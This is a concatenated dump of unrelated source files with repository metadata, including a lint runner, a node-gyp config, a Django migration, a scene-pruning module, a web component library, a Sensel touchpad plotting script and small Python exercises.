parser.add_argument("--file", help="YAML file with actions")
parser.add_argument(
"--file-filter",
help="only pass through files with this extension",
nargs="*",
)
parser.add_argument(
"--changed-only",
help="only run on changed files",
action="store_true",
default=False,
)
parser.add_argument("--job", help="job name", required=True)
parser.add_argument(
"--no-quiet", help="output commands", action="store_true", default=False
)
parser.add_argument("--step", action="append", help="steps to run (in order)")
args = parser.parse_args()
relevant_files = None
quiet = not args.no_quiet
if args.changed_only:
relevant_files = relevant_changed_files(args.file_filter)
if args.file is None:
# If there is no .yml file provided, fall back to the list of known
# jobs. We use this for flake8 and mypy since they run different
# locally than in CI due to 'make quicklint'
if args.job not in ad_hoc_steps:
raise RuntimeError(
f"Job {args.job} not found and no .yml file was provided"
)
future = ad_hoc_steps[args.job](relevant_files, quiet)
else:
if args.step is None:
raise RuntimeError("1+ --steps must be provided")
action = yaml.safe_load(open(args.file, "r"))
if "jobs" not in action:
raise RuntimeError(f"top level key 'jobs' not found in {args.file}")
jobs = action["jobs"]
if args.job not in jobs:
raise RuntimeError(f"job '{args.job}' not found in {args.file}")
job = jobs[args.job]
# Pull the relevant sections out of the provided .yml file and run them
relevant_steps = grab_specific_steps(args.step, job)
future = run_steps(relevant_steps, args.job, relevant_files, quiet)
loop = asyncio.get_event_loop()
loop.run_until_complete(future)
# These are run differently locally in order to enable quicklint, so dispatch
# out to special handlers instead of using lint.yml
ad_hoc_steps = {
"mypy": run_mypy,
"flake8-py3": run_flake8,
"shellcheck": run_shellcheck,
}
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
0d1b9c610d1411343055a6f90d03eb24479eea2a | 91c74abe400034336d98490165e89897c6ad2078 | /node_modules/pg/build/config.gypi | 7b7249c67f0842d1c212a49287759cb0c611599e | [
"MIT"
] | permissive | sengcheav/group | 852f8f2c30f1dc79a2cbf2df7924cedb211ec38f | f00ac357fb5d2e144496af9902ff8f8759862c76 | refs/heads/master | 2016-09-15T23:31:19.757192 | 2016-03-01T00:53:14 | 2016-03-01T00:53:14 | 37,701,877 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,251 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 49,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "/usr/pkg",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "true",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"openssl_no_asm": 0,
"python": "/usr/pkg/bin/python2.7",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/u/students/leatseng/.node-gyp/0.10.36",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/pkg/etc/npmignore",
"init_author_url": "",
"shell": "/bin/tcsh",
"parseable": "",
"shrinkwrap": "true",
"email": "",
"init_license": "ISC",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"npat": "",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/pkg/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"cafile": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"json": "",
"https_proxy": "http://www-cache.ecs.vuw.ac.nz:8080/",
"description": "true",
"engine_strict": "",
"init_module": "/u/students/leatseng/.npm-init.js",
"userconfig": "/u/students/leatseng/.npmrc",
"node_version": "0.10.36",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"username": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "25",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/u/students/leatseng/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/1.4.28 node/v0.10.36 linux x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"umask": "63",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/tmp",
"unsafe_perm": "true",
"link": "",
"prefix": "/usr/pkg"
}
}
| [
"leatseng@barretts.ecs.vuw.ac.nz"
] | leatseng@barretts.ecs.vuw.ac.nz |
5c03b63199ce12903d3e2e9941d7d45034431151 | de95e9ace929f6279f5364260630e4bf7a658c1c | /recursion.py | bb3d67bb866d8fbe991317696a4fae7cd83a89fe | [] | no_license | ludwigwittgenstein2/Algorithms-Python | ceaf0739b8582f7bd749a9b3f52f283765044744 | c5bed8b2e398c218d1f36e72b05a3f5545cf783a | refs/heads/master | 2021-06-19T11:40:31.012268 | 2017-07-02T04:59:20 | 2017-07-02T04:59:20 | 75,953,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | def factorial(n):
if n == 0:
return 1
else:
recurse = factorial(n - 1)
result = n*recurse
return result
| [
"penpals.oranges14@gmail.com"
] | penpals.oranges14@gmail.com |
2088cf6c06643d2ed7ae354196914827db1fe712 | 5af418f24afe2cc59356c8c64645c570b898934b | /terrarium/geomap/migrations/0001_initial.py | 852f68461249f95c797b8663b4da45fc37b2b708 | [] | no_license | roystchiang/terrarium | a7bcdc2ab5a316b01f4f6598c0aad55316cab8d4 | 9ac5b045d7db43c4cd43d40cca8941cf1f53d642 | refs/heads/master | 2021-05-31T13:06:04.877844 | 2016-05-20T21:22:00 | 2016-05-20T21:22:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,556 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-05-10 20:05
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('display_name', models.CharField(max_length=255)),
('osm_id', models.PositiveIntegerField(unique=True)),
('place_id', models.PositiveIntegerField()),
('last_updated', models.DateTimeField(auto_now=True)),
('osm_type', models.IntegerField(choices=[(0, b'None'), (1, b'Node'), (2, b'Way'), (3, b'Relation')], default=0)),
],
),
migrations.CreateModel(
name='PlacePolygon',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('polygon', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
('last_updated', models.DateTimeField(auto_now=True)),
('simplicity', models.IntegerField(default=0)),
('place', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='polygons', to='geomap.Place')),
],
),
]
| [
"crosscent@gmail.com"
] | crosscent@gmail.com |
d8150258ebc46e1cc860b8ddae0fe8c7233727e0 | 334af53a03b4e140b5f5dd9db1c677dfdef325d4 | /tests/config_yaml_test.py | 272ba1848155c4637ccf1fa8637557460df2f998 | [
"Apache-2.0"
] | permissive | IgorFlint/a2ml | fc229c47e3e08ea6aee30aa4219c5c4bc137e987 | c54a8a1770195a702048ca9820353d6d347daf95 | refs/heads/master | 2020-06-15T08:46:17.079004 | 2019-06-21T12:56:19 | 2019-06-21T12:56:19 | 195,252,061 | 1 | 0 | null | 2019-07-04T14:00:34 | 2019-07-04T14:00:34 | null | UTF-8 | Python | false | false | 1,783 | py | from builtins import str
from builtins import object
from argparse import Namespace
from a2ml.api.utils.config_yaml import ConfigYaml
class TestConfigYaml(object):
def setup_method(self, method):
self.yaml = ConfigYaml()
def test_load_from_file(self):
self.yaml.load_from_file('tests/data/iris_train/auger_experiment.yml')
assert self.yaml.cluster.instance_type == 'c5.2xlarge'
def test_load_from_file_without_name(self):
try:
self.yaml.load_from_file(None)
assert False
except ValueError as e:
assert str(e) == 'please provide yaml file name'
except:
assert False
try:
self.yaml.load_from_file('')
assert False
except ValueError as e:
assert str(e) == 'please provide yaml file name'
except:
assert False
def test_merge_namespace(self):
ns = Namespace()
ns.ns_attribute = 'ns value'
self.yaml.yaml_attribyte = "yaml value"
self.yaml.merge_namespace(ns)
assert vars(self.yaml) == {
'ns_attribute': 'ns value',
'yaml_attribyte': 'yaml value',
'filename': None}
def test_get_with_path(self):
value = 'value of attr2'
self.yaml.attr1 = Namespace()
self.yaml.attr1.attr2 = value
assert self.yaml.get('attr1/attr2') == value
def test_get_default_with_path(self):
value = 'value of attr2'
assert self.yaml.get('attr1/attr2', value) == value
def test_get_default_with_empty_attr(self):
default = 'value of attr2'
self.yaml.attr1 = Namespace()
self.yaml.attr1.attr2 = None
assert self.yaml.get('attr1/attr2', default) == default
| [
"vlad@dplrn.com"
] | vlad@dplrn.com |
f3bcbcf2b43044c76fd77389f545ad3bef57d962 | 83758b6ff637610f3fdd85da2b14d48e51769dfd | /src/probRobScene/core/pruning.py | 6649d8be9207b6091f4717d9d5880e281393f742 | [
"MIT"
] | permissive | ICRA-2021/ProbRobScene | 58e502c6e33e5fd64fcf71962ceddee1583e3a78 | 2a6f3cac0f51f96955e2fdf18635df0a0985840f | refs/heads/master | 2023-06-23T19:56:51.833905 | 2021-07-20T09:23:06 | 2021-07-20T09:23:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,204 | py | from copy import copy
import time
from typing import List
import probRobScene.core.distributions
from probRobScene.core.intersections import intersect_many, erode_hsis, to_hsi, intersect
from probRobScene.core.object_types import Object
from probRobScene.core.regions import PointInRegionDistribution, Intersection, Intersect, Convex, ConvexPolyhedron, Cuboid
from probRobScene.core.scenarios import Scenario
from probRobScene.core.vectors import Vector3D
from probRobScene.core.distributions import needs_sampling
def prune(s: Scenario, verbosity: int = 1) -> None:
if verbosity >= 1:
print(' Pruning scenario...')
start_time = time.time()
for o in s.objects:
prune_obj(o, s)
if verbosity >= 1:
total_time = time.time() - start_time
print(f' Pruned scenario in {total_time:.4g} seconds.')
def prune_obj(o: Object, scenario: Scenario):
if not isinstance(o.position, PointInRegionDistribution):
return o
pruned_pos = o.position
if isinstance(o.position.region, Intersection):
r_intersected = intersect_many(*o.position.region.regions)
pruned_pos = PointInRegionDistribution(r_intersected)
# With a fixed orientation, we can precisely erode the outer workspace, otherwise we must approximate with a default orientation
if not needs_sampling(o.orientation):
eroded_container = erode_container(scenario.workspace, o.dimensions, o.orientation)
else:
eroded_container = erode_container(scenario.workspace, o.dimensions, Vector3D(0, 0, 0))
new_base = intersect_container(eroded_container, pruned_pos.region)
o.position._conditioned = PointInRegionDistribution(new_base)
@probRobScene.core.distributions.distributionFunction
def intersect_container(container: Convex, obj_pos_region: Intersect):
new_base = intersect(obj_pos_region, container)
return new_base
@probRobScene.core.distributions.distributionFunction
def erode_container(container: Convex, obj_dims: Vector3D, obj_rot: Vector3D):
o_hsi = to_hsi(Cuboid(Vector3D(0.0, 0.0, 0.0), obj_rot, *obj_dims))
container_hsi = to_hsi(container)
return ConvexPolyhedron(erode_hsis(container_hsi, o_hsi))
| [
"craiginnes@gmail.com"
] | craiginnes@gmail.com |
706e98389051b53c21fed428b65f6748aea8884a | 18f8a1c7122c0b320f17ea31192439779a8c63e8 | /zoom/component.py | 4c33c561fec51ddfa4e1a08ca62ab77817d6130e | [
"MIT"
] | permissive | RyanLainchbury/zoom | d49afa8d3506fca2c6e426707bd60ba640420a45 | 684a16f4fe3cea3d26f2d520c743a871ca84ecc5 | refs/heads/master | 2020-12-25T19:03:12.881247 | 2017-06-09T07:29:27 | 2017-06-09T07:29:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,879 | py | """
zoom.component
Components encapsulate all of the parts that are required to make a
component appear on a page. This can include HTML, CSS and Javascript
parts and associated libraries.
Components parts are assembled in the way that kind of part
needs to be treated. For example HTML parts are simply joined
together in order and returned. CSS parts on the other hand are
joined together but any duplicate parts are ignored.
When a caller supplies JS or CSS as part of the component being assembled
these extra parts are submitted to the system to be included in thier
proper place within a response (typically a page template).
The Component object is currently experimental and is intended to be used
in future releases.
"""
import logging
import threading
from zoom.utils import OrderedSet, pp
# TODO: rename this to context (or system?)
composition = threading.local()
class Component(object):
"""component of a page response
>>> c = Component()
>>> c
<Component: {'html': []}>
>>> c += 'test'
>>> c
<Component: {'html': ['test']}>
>>> c += dict(css='mycss')
>>> c
<Component: {'css': OrderedSet(['mycss']), 'html': ['test']}>
>>> c += dict(css='mycss')
>>> c
<Component: {'css': OrderedSet(['mycss']), 'html': ['test']}>
>>> c += 'test2'
>>> sorted(c.parts.items())
[('css', OrderedSet(['mycss'])), ('html', ['test', 'test2'])]
>>> Component() + 'test1' + 'test2'
<Component: {'html': ['test1', 'test2']}>
>>> Component() + 'test1' + dict(css='mycss')
<Component: {'css': OrderedSet(['mycss']), 'html': ['test1']}>
>>> Component('test1', Component('test2'))
<Component: {'html': ['test1', 'test2']}>
>>> Component(
... Component('test1', css='css1'),
... Component('test2', Component('test3', css='css3')),
... )
<Component: {'css': OrderedSet(['css1', 'css3']), 'html': ['test1', 'test2', 'test3']}>
>>> Component((Component('test1', css='css1'), Component('test2', css='css2')))
<Component: {'css': OrderedSet(['css1', 'css2']), 'html': ['test1', 'test2']}>
>>> Component(Component('test1', css='css1'), Component('test2', css='css2'))
<Component: {'css': OrderedSet(['css1', 'css2']), 'html': ['test1', 'test2']}>
>>> composition.parts = Component()
>>> c = Component(Component('test1', css='css1'), Component('test2', css='css2'))
>>> c.render()
'test1test2'
>>> page2 = \\
... Component() + \\
... '<h1>Title</h1>' + \\
... dict(css='mycss') + \\
... dict(js='myjs') + \\
... 'page body goes here'
>>> t = (
... "<Component: {'css': OrderedSet(['mycss']), "
... "'html': ['<h1>Title</h1>', 'page body goes here'], "
... "'js': OrderedSet(['myjs'])}>"
... )
>>> #print(repr(page2) + '\\n' + t)
>>> repr(page2) == t
True
"""
# pylint: disable=too-few-public-methods
def __init__(self, *args, **kwargs):
"""construct a Component
>>> Component()
<Component: {'html': []}>
>>> Component('body')
<Component: {'html': ['body']}>
>>> Component('body', css='css1')
<Component: {'css': OrderedSet(['css1']), 'html': ['body']}>
>>> t = Component('body', css='css1', js='js1')
>>> repr(t) == (
... "<Component: {"
... "'css': OrderedSet(['css1']), "
... "'html': ['body'], "
... "'js': OrderedSet(['js1'])"
... "}>"
... )
True
"""
def is_iterable(obj):
"""Returns True if object is an iterable but not a string"""
return hasattr(obj, '__iter__') and not isinstance(obj, str)
def flatten(items):
"""Returns list of items with sublists incorporated into list"""
items_as_iterables = list(is_iterable(i) and i or (i,) for i in items)
return [i for j in items_as_iterables for i in j]
self.parts = {
'html': [],
}
for arg in flatten(args):
self += arg
self += kwargs
def __iadd__(self, other):
"""add something to a component
>>> page = Component('<h1>Title</h1>')
>>> page += dict(css='mycss')
>>> page += 'page body goes here'
>>> page += dict(js='myjs')
>>> result = (
... "<Component: {"
... "'css': OrderedSet(['mycss']), "
... "'html': ['<h1>Title</h1>', 'page body goes here'], "
... "'js': OrderedSet(['myjs'])"
... "}>"
... )
>>> #print(page)
>>> #print(result)
>>> result == repr(page)
True
>>> page = Component('test')
>>> page += dict(html='text')
>>> page
<Component: {'html': ['test', 'text']}>
"""
def rendered(obj):
"""call the render method if necessary"""
if not isinstance(obj, Component) and hasattr(obj, 'render'):
return obj.render()
return obj
other = rendered(other)
if isinstance(other, str):
self.parts['html'].append(other)
elif isinstance(other, dict):
for key, value in other.items():
part = self.parts.setdefault(key, OrderedSet())
if key == 'html':
if isinstance(value, list):
part.extend(value)
else:
part.append(value)
else:
if isinstance(value, list):
part |= value
else:
part |= [value]
elif isinstance(other, Component):
for key, value in other.parts.items():
part = self.parts.setdefault(key, OrderedSet())
if key == 'html':
part.extend(value)
else:
part |= value
return self
def __add__(self, other):
"""add a component to something else
>>> (Component() + 'test1' + dict(css='mycss')) + 'test2'
<Component: {'css': OrderedSet(['mycss']), 'html': ['test1', 'test2']}>
>>> Component() + 'test1' + dict(css='mycss') + dict(css='css2')
<Component: {'css': OrderedSet(['mycss', 'css2']), 'html': ['test1']}>
"""
result = Component()
result += self
result += other
return result
def __repr__(self):
return '<Component: {{{}}}>'.format(
', '.join(
'{!r}: {!r}'.format(i, j)
for i, j in sorted(self.parts.items())
)
)
def render(self):
"""renders the component"""
composition.parts += self
return ''.join(self.parts['html'])
def __str__(self):
return self.render()
component = Component
def compose(*args, **kwargs):
"""Compose a response - DEPRECATED"""
composition.parts += component(**kwargs)
return ''.join(args)
def handler(request, handler, *rest):
"""Component handler"""
pop = request.session.__dict__.pop
composition.parts = Component(
success=pop('system_successes', []),
warning=pop('system_warnings', []),
error=pop('system_errors', []),
)
result = handler(request, *rest)
logger = logging.getLogger(__name__)
logger.debug('component middleware')
# TODO: clean this up, use a single alerts list with an alert type value
success_alerts = composition.parts.parts.get('success')
if success_alerts:
if not hasattr(request.session, 'system_successes'):
request.session.system_successes = []
request.session.system_successes = list(success_alerts)
warning_alerts = composition.parts.parts.get('warning')
if warning_alerts:
if not hasattr(request.session, 'system_warnings'):
request.session.system_warnings = []
request.session.system_warnings = list(warning_alerts)
error_alerts = composition.parts.parts.get('error')
if error_alerts:
if not hasattr(request.session, 'system_errors'):
request.session.system_errors = []
request.session.system_errors = list(error_alerts)
return result
# def component(*args, **kwargs):
# """assemble parts of a component
#
# >>> system.setup()
# >>> system.css
# OrderedSet()
#
# >>> component('test', css='mycss')
# 'test'
# >>> system.css
# OrderedSet(['mycss'])
#
# >>> component(100, css='mycss')
# '100'
#
# >>> component(css='mycss', html='test')
# 'test'
# >>> system.css
# OrderedSet(['mycss'])
#
# >>> component('test', html='more', css='mycss')
# 'testmore'
# >>> system.css
# OrderedSet(['mycss'])
#
# >>> component('test', 'two', css=['mycss','css2'], js='myjs')
# 'testtwo'
# >>> system.css
# OrderedSet(['mycss', 'css2'])
# >>> system.js
# OrderedSet(['myjs'])
#
# >>> component('test', js='js2')
# 'test'
# >>> system.js
# OrderedSet(['myjs', 'js2'])
#
# >>> component(['test1'], ('test2',), 'test3')
# 'test1test2test3'
#
# >>> from mvc import DynamicView
# >>> class MyThing(DynamicView):
# ... def __str__(self):
# ... return self.model
# >>> hasattr(MyThing('test'), '__iter__')
# False
# >>> component(['test1'], ('test2',), 'test3', MyThing('test4'))
# 'test1test2test3test4'
# >>> component(MyThing('test4'))
# 'test4'
# >>> component(MyThing('test4'), MyThing('test5'))
# 'test4test5'
# >>> component((MyThing('test4'), MyThing('test5')))
# 'test4test5'
# >>> args = (MyThing('test4'), MyThing('test5'))
# >>> component(args)
# 'test4test5'
# >>> component(*list(args))
# 'test4test5'
#
# >>> system.setup()
# >>> component('test', js=[])
# 'test'
# >>> system.js
# OrderedSet()
# """
# def is_iterable(item):
# return hasattr(item, '__iter__')
#
# def as_iterable(item):
# return not is_iterable(item) and (item,) or item
#
# def flatten(items):
# items_as_iterables = list(is_iterable(i) and i or (i,) for i in items)
# return [i for j in items_as_iterables for i in j]
#
# parts = {
# 'html': flatten(args),
# }
# for key, value in kwargs.items():
# part = parts.setdefault(key, OrderedSet())
# if key == 'html':
# part.extend(as_iterable(value))
# else:
# part |= OrderedSet(as_iterable(value))
# for key in ['css', 'js', 'styles', 'libs', 'head', 'tail']:
# part = getattr(system, key)
# part |= parts.get(key, [])
# return ''.join(map(str, parts['html']))
| [
"herb@dynamic-solutions.com"
] | herb@dynamic-solutions.com |
267bb492f6f1d1c52316995189ee560e6d5fac8b | cbbd5ae034bfc4a81a49af0fb7712516136afa6a | /PycharmProjects/Sensel/MISC/plot_contact_point_dynamic.py | c9c6a4d57c05bf7f73c33ae49037fdcb550ba242 | [] | no_license | pratikaher88/SenselWork | fafe12037ae8349510f29b3dc60130d26992ea77 | d6f17bca7d2ac6ec6621f9b1b1540ca9e80eb2f7 | refs/heads/master | 2020-03-22T09:12:19.559029 | 2019-09-08T19:25:15 | 2019-09-08T19:25:15 | 139,822,527 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,496 | py | #!/usr/bin/env python
##########################################################################
# MIT License
#
# Copyright (c) 2013-2017 Sensel, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
# to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
##########################################################################
import sys
from SenselUse import sensel,sensel_register_map
import binascii
import threading
import matplotlib.pyplot as plt
from matplotlib import animation
from matplotlib import style
style.use('fivethirtyeight')
fig=plt.figure()
ax1=fig.add_subplot(1,1,1)
global enter_pressed
X=[]
Y=[]
def waitForEnter():
global enter_pressed
input("Press Enter to exit...")
enter_pressed = True
return
def openSensel():
handle = None
(error, device_list) = sensel.getDeviceList()
if device_list.num_devices != 0:
(error, handle) = sensel.openDeviceByID(device_list.devices[0].idx)
return handle
def initFrame():
error = sensel.setFrameContent(handle, sensel.FRAME_CONTENT_PRESSURE_MASK | sensel.FRAME_CONTENT_CONTACTS_MASK)
sensel.setContactsMask(handle, sensel.CONTACT_MASK_ELLIPSE | sensel.CONTACT_MASK_BOUNDING_BOX)
# sensel.writeReg(handle, sensel_register_map.SENSEL_REG_BASELINE_DYNAMIC_ENABLED, 1, [0])
(error, frame) = sensel.allocateFrameData(handle)
error = sensel.startScanning(handle)
return frame
# def initFrameForContacts():
# error = sensel.setFrameContent(handle, sensel.FRAME_CONTENT_CONTACTS_MASK)
# (error, frame) = sensel.allocateFrameData(handle)
# error = sensel.startScanning(handle)
# return frame
def scanFrames(frame, info):
error = sensel.readSensor(handle)
(error, num_frames) = sensel.getNumAvailableFrames(handle)
for i in range(num_frames):
error = sensel.getFrame(handle, frame)
printFrame(frame, info)
def printFrame(frame, info):
# total_force = 0.0
# for n in range(info.num_rows * info.num_cols):
# total_force += frame.force_array[n]
# print("Total Force: " + str(total_force))
if frame.n_contacts > 0:
print("\nNum Contacts: ", frame.n_contacts)
for n in range(frame.n_contacts):
c = frame.contacts[n]
print("Contact ID: ", c.id)
print("X_pos",c.x_pos)
print("Y_pos",c.y_pos)
X.append(c.x_pos)
Y.append(c.y_pos)
plt.ion()
animated_plot = plt.plot(X, Y, 'ro')[0]
for i in range(len(X)):
animated_plot.set_xdata(X[0:i])
animated_plot.set_ydata(Y[0:i])
plt.draw()
plt.pause(0.0001)
# f = open('sampleText', 'a')
# f.write(str(c.x_pos)+','+str(c.y_pos)+'\n')
# animate(c.x_pos,c.y_pos)
# plt.scatter(c.x_pos, c.y_pos)
# ani = animation.FuncAnimation(plt.figure(), plt.scatter(c.x_pos,c.y_pos), interval=1000)
# plt.show(block=False)
total_force = 0.0
for n in range(info.num_rows * info.num_cols):
total_force += frame.force_array[n]
print("Total Force", total_force)
if c.state == sensel.CONTACT_START:
sensel.setLEDBrightness(handle, c.id, 100)
# Gives force at contact begin
# for n in range(info.num_rows * info.num_cols):
# total_force += frame.force_array[n]
elif c.state == sensel.CONTACT_END:
sensel.setLEDBrightness(handle, c.id, 0)
def closeSensel(frame):
error = sensel.freeFrameData(handle, frame)
error = sensel.stopScanning(handle)
error = sensel.close(handle)
if __name__ == "__main__":
global enter_pressed
enter_pressed = False
plt.xlim(0, 230)
plt.ylim(0, 130)
# plt.scatter(X, Y)
plt.gca().invert_yaxis()
# plt.show(block=False)
handle = openSensel()
if handle != None:
(error, info) = sensel.getSensorInfo(handle)
frame = initFrame()
t = threading.Thread(target=waitForEnter)
t.start()
while (enter_pressed == False):
scanFrames(frame, info)
closeSensel(frame)
# plt.xlim(0, 230)
# plt.ylim(0, 130)
plt.scatter(X, Y)
# plt.gca().invert_yaxis()
# ani = animation.FuncAnimation(fig, animatethis, interval=1000)
# plt.show()
# with open('sampleText', "w"):
# pass
print(X)
print(Y)
| [
"pratikaher88@gmail.com"
] | pratikaher88@gmail.com |
aa508394ac52f05763dfa20934d3dfac4bbab93a | ef74156399cbc4b58732ecbc1f62f25597e503dd | /scripts/ryu/connection.py | e557e8903033d1431425882955770a66f1f6d89c | [
"Apache-2.0"
] | permissive | martinoravsky/ryu | 138dcc9fcd3c94b9e764742f576c42e4ce98ec43 | 236d761b802398efecec02b36329a16378600712 | refs/heads/master | 2021-09-13T00:50:09.705531 | 2018-04-23T12:16:49 | 2018-04-23T12:16:49 | 107,885,767 | 0 | 0 | null | 2017-10-22T17:06:36 | 2017-10-22T17:06:36 | null | UTF-8 | Python | false | false | 185 | py | import mysql
def connect():
conn = mysql.connector.connect(host='192.168.56.101',
database='mptcp',
user='mptcp',
password='mptcp123')
return conn | [
"martinoravskyjr@gmail.com"
] | martinoravskyjr@gmail.com |
a3c12641a2a38ce54c6fe2aef9dff85dc74d8a75 | ccc55c7a05cd115e029f04cd577b11b70d0d3fdc | /Chapter 2/D4 TI B/Dyning Aida Batrishya(1184030)/src/NPM9.py | bdfe66bce59887e5a9ba35766fa55636df459a63 | [
"MIT"
] | permissive | ariqrafikusumah/Tugas | 6019be8c3219c930730d29076efd4494a3c70c79 | 6903117a91ad3002033c6d0297b4d1d06903088d | refs/heads/master | 2020-09-15T19:51:29.066553 | 2020-02-29T12:08:36 | 2020-02-29T12:08:36 | 216,065,279 | 0 | 0 | null | 2019-10-18T16:28:46 | 2019-10-18T16:28:45 | null | UTF-8 | Python | false | false | 529 | py | # -*- coding: utf-8 -*-
"""
@author: ASS
"""
i=0
NPM = input("berapa npm kamu : ")
while i<1:
if len(NPM)<7:
print("Npmnya kurang dari 7 digit")
NPM = input("Npm kamu : ")
elif len(NPM)>7:
print("Npm lebih dari 7 digit")
NPM = input("Npm kamu: ")
else:
i=1
A=NPM[0]
B=NPM[1]
C=NPM[2]
D=NPM[3]
E=NPM[4]
F=NPM[5]
G=NPM[6]
X=1
for this in A,B,C,D,E,F,G:
if int(this)%2==0:
if int(this)==0:
this=""
print(this,end =" ")
| [
"aida.batrishya@gmail.com"
] | aida.batrishya@gmail.com |
0f5724a7f2cdf98f3c4f9d0122f6cec69aa538ff | 7161f06c0b57711f788d664709f78456d11e9a1b | /Python/flask_fundamentals/hello_flask/server2.py | e840f4f1f0ab33945ccf3ec9922ecedf25c47be2 | [] | no_license | yaronlevi1/CDcode | b00a51a33c43355d4ea53661c065a2cd8641b785 | 4dc925283715d4dd66733353491d49454865d68c | refs/heads/master | 2022-12-02T04:34:08.044682 | 2018-03-15T19:52:15 | 2018-03-15T19:52:15 | 120,852,330 | 0 | 1 | null | 2022-11-28T03:57:53 | 2018-02-09T03:37:37 | Python | UTF-8 | Python | false | false | 386 | py | from flask import Flask, render_template, request, redirect
app = Flask(__name__)
@app.route('/users/<username>')
def show_user_profile(username):
print(username)
return render_template("success.html")
@app.route('/users/<username>/<id>')
def show_user_profile2(username, id):
print(username)
print(id)
return render_template("success.html")
app.run(debug=True) | [
"yaronlevi1@gmail.com"
] | yaronlevi1@gmail.com |
4c533330fc30bad9170734f0a1c30bbcfc8d9a59 | b521802cca8e4ee4ff5a5ffe59175a34f2f6d763 | /maya/maya-utils/Scripts/Animation/2019-2-15 Tim Cam_Route_Manager/.history/Cam_Main/Cam_Main/Cam_Item_Layout_20190117213541.py | 1cc9c0f906fa3ff3efcc249cec01387c59eb07fa | [] | no_license | all-in-one-of/I-Do-library | 2edf68b29558728ce53fe17168694ad0353a076e | 8972ebdcf1430ccc207028d8482210092acf02ce | refs/heads/master | 2021-01-04T06:58:57.871216 | 2019-12-16T04:52:20 | 2019-12-16T04:52:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,830 | py | # -*- coding:utf-8 -*-
# Require Header
import os
import json
from functools import partial
# Sys Header
import sys
import traceback
import subprocess
import plugin.Qt as Qt
from Qt.QtCore import *
from Qt.QtGui import *
from Qt.QtWidgets import *
def loadUiType(uiFile):
import plugin.Qt as Qt
if Qt.__binding__.startswith('PyQt'):
from Qt import _uic as uic
return uic.loadUiType(uiFile)
elif Qt.__binding__ == 'PySide':
import pysideuic as uic
else:
import pyside2uic as uic
import xml.etree.ElementTree as xml
from cStringIO import StringIO
parsed = xml.parse(uiFile)
widget_class = parsed.find('widget').get('class')
form_class = parsed.find('class').text
with open(uiFile, 'r') as f:
o = StringIO()
frame = {}
uic.compileUi(f, o, indent=0)
pyc = compile(o.getvalue(), '<string>', 'exec')
exec pyc in frame
